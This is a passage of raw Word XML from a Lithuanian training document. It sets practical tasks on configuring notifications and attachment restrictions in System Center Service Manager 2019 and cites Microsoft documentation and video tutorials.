          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Manage incidents and problems in Service Manager. (2016, spalio 12). </w:t>
      </w:r>
      <w:r w:rsidR="3757808B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="79A7C4AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="1B423D46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>https://docs.microsoft.com/en-us/system-center/scsm/incidents-problems?view=sc-sm-2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D844E78" w14:textId="10A45E98" w:rsidR="70D2AF4F" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="00704E3F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId76">
        <w:r w:rsidR="0E9FF69D" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Install System Center Configuration Manager 2019 (SCCM 2019)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0E9FF69D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="4E8751E0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(2019, balandžio 20). </w:t>
      </w:r>
      <w:r w:rsidR="4E8751E0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Lab. </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="59B80F4C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:history="1">
        <w:r w:rsidR="00704E3F" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=mN12es1rbJ8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71FA2BAD" w14:textId="7A3ABB62" w:rsidR="00A85DAD" w:rsidRPr="005A5C28" w:rsidRDefault="4CB0A254" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Plan for System Center - Service Manager deployment. (2018, sausio 23). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://docs.microsoft.com/en-us/system-center/scsm/plan-deployment?view=sc-sm-2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38216451" w14:textId="355A699F" w:rsidR="00D03EE4" w:rsidRPr="005A5C28" w:rsidRDefault="2CD77F85" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>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Prepare for System Center - Service Manager deployment. (2020, gruodžio 9). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Microsoft.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://docs.microsoft.com/en-us/system-center/scsm/prepare-deploy?view=sc-sm-2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74125010" w14:textId="227D1941" w:rsidR="00203A16" w:rsidRPr="005A5C28" w:rsidRDefault="2CD77F85" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Install System Center Service Manager 2019 Step by Step Full. (2020, rugsėjo 21). </w:t>
      </w:r>
      <w:hyperlink r:id="rId78">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Labs Hands On</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId79">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=3TPsuio8PP8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E1198B5" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="5F1167BE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Troubleshoot computer problems with Service Manager tasks. (2016, spalio 12). Microsoft. Prieiga per internetą: https://docs.microsoft.com/en-us/system-center/scsm/troubleshoot-with-tasks?view=sc-sm-2019#run-a-task-from-an-incident-view</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318BA36F" w14:textId="5C7D4D76" w:rsidR="002316B0" w:rsidRPr="005A5C28" w:rsidRDefault="002316B0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD2016C" w14:textId="160210BD" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="46C41297" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="6B437433" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="6B437433" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="08EB53A3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">KONFIGŪRUOTI </w:t>
      </w:r>
      <w:r w:rsidR="4D6BBCAA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PRANEŠIMUS</w:t>
      </w:r>
      <w:r w:rsidR="08EB53A3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> INCIDENTŲ VALDYMO SISTEMOJE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DF8734" w14:textId="5CFED721" w:rsidR="08EB53A3" w:rsidRPr="005A5C28" w:rsidRDefault="08EB53A3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="00053C6E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">diegtoje informacinėje valdymo sistemoje (Service Desk) </w:t>
      </w:r>
      <w:r w:rsidR="00622E20" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>System Center Service Manager 2019</w:t>
      </w:r>
      <w:r w:rsidR="00622E20" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B23101" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(arba lygiavertėje) </w:t>
      </w:r>
      <w:r w:rsidR="648300AA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>konfigūruo</w:t>
      </w:r>
      <w:r w:rsidR="008C3376" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="648300AA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pranešimus</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Glaustai </w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>prašy</w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> incidento kūrimą ir konfigūravim</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>o procesą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587F905A" w14:textId="77777777" w:rsidR="00902AC8" w:rsidRPr="005A5C28" w:rsidRDefault="00902AC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="301A167E" w14:textId="06F0A1E5" w:rsidR="77902E9A" w:rsidRPr="005A5C28" w:rsidRDefault="77902E9A" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225266F7" w14:textId="45AFADEA" w:rsidR="77902E9A" w:rsidRPr="005A5C28" w:rsidRDefault="77902E9A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Plan for System Center - Service Manager deployment. (20</w:t>
      </w:r>
      <w:r w:rsidR="5CEAB2E6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="6BDCB97C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>gruodžio</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 23). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://docs.microsoft.com/en-us/system-center/scsm/plan-deployment?view=sc-sm-2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F210333" w14:textId="62DA11A3" w:rsidR="77902E9A" w:rsidRPr="005A5C28" w:rsidRDefault="77902E9A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure Incident Management in Service Manager. </w:t>
      </w:r>
      <w:r w:rsidR="655654A4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(2020, gruodžio 23).</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId80">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/system-center/scsm/incident-mgt?view=sc-sm-2019</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5870F1A8" w14:textId="77777777" w:rsidR="002316B0" w:rsidRPr="005A5C28" w:rsidRDefault="002316B0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D14CBF" w14:textId="65C398EF" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="636E5A06" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>8 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PRANEŠIMŲ PRENUMERATOS PATVIRTINIMAS IR KONFIGŪRACIJOS PATIKRA INCIDENTŲ VALDYMO SISTEMOJE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69385D34" w14:textId="26FE5471" w:rsidR="636E5A06" w:rsidRPr="005A5C28" w:rsidRDefault="636E5A06" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="00361C48" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">diegtoje informacinėje valdymo sistemoje (Service Desk) </w:t>
      </w:r>
      <w:r w:rsidR="009F61A8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>System Center Service Manager 2019</w:t>
      </w:r>
      <w:r w:rsidR="009F61A8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“ (arba lygiavertėje)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> konfigūruoti failų priedų apribojimus. Pateikti ekrano vaizdus ir konfigūravimo</w:t>
      </w:r>
      <w:r w:rsidR="0018260C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>aprašą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782AADB4" w14:textId="77777777" w:rsidR="00902AC8" w:rsidRPr="005A5C28" w:rsidRDefault="00902AC8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="464A16D5" w14:textId="30D1B572" w:rsidR="674277D9" w:rsidRPr="005A5C28" w:rsidRDefault="674277D9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B9A94" w14:textId="24A5EAF4" w:rsidR="229A0DED" w:rsidRPr="005A5C28" w:rsidRDefault="229A0DED" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>To validate email notifications</w:t>
      </w:r>
      <w:r w:rsidR="674277D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. (2020, gruodžio 23). </w:t>
      </w:r>
      <w:r w:rsidR="674277D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidR="674277D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:r w:rsidR="47C4B7C2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>https://docs.microsoft.com/en-us/system-center/scsm/notifications?view=sc-sm-2019#to-validate-email-notification-configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02540FD2" w14:textId="644CE81D" w:rsidR="1B4026A6" w:rsidRPr="005A5C28" w:rsidRDefault="1B4026A6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>To create a periodic</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
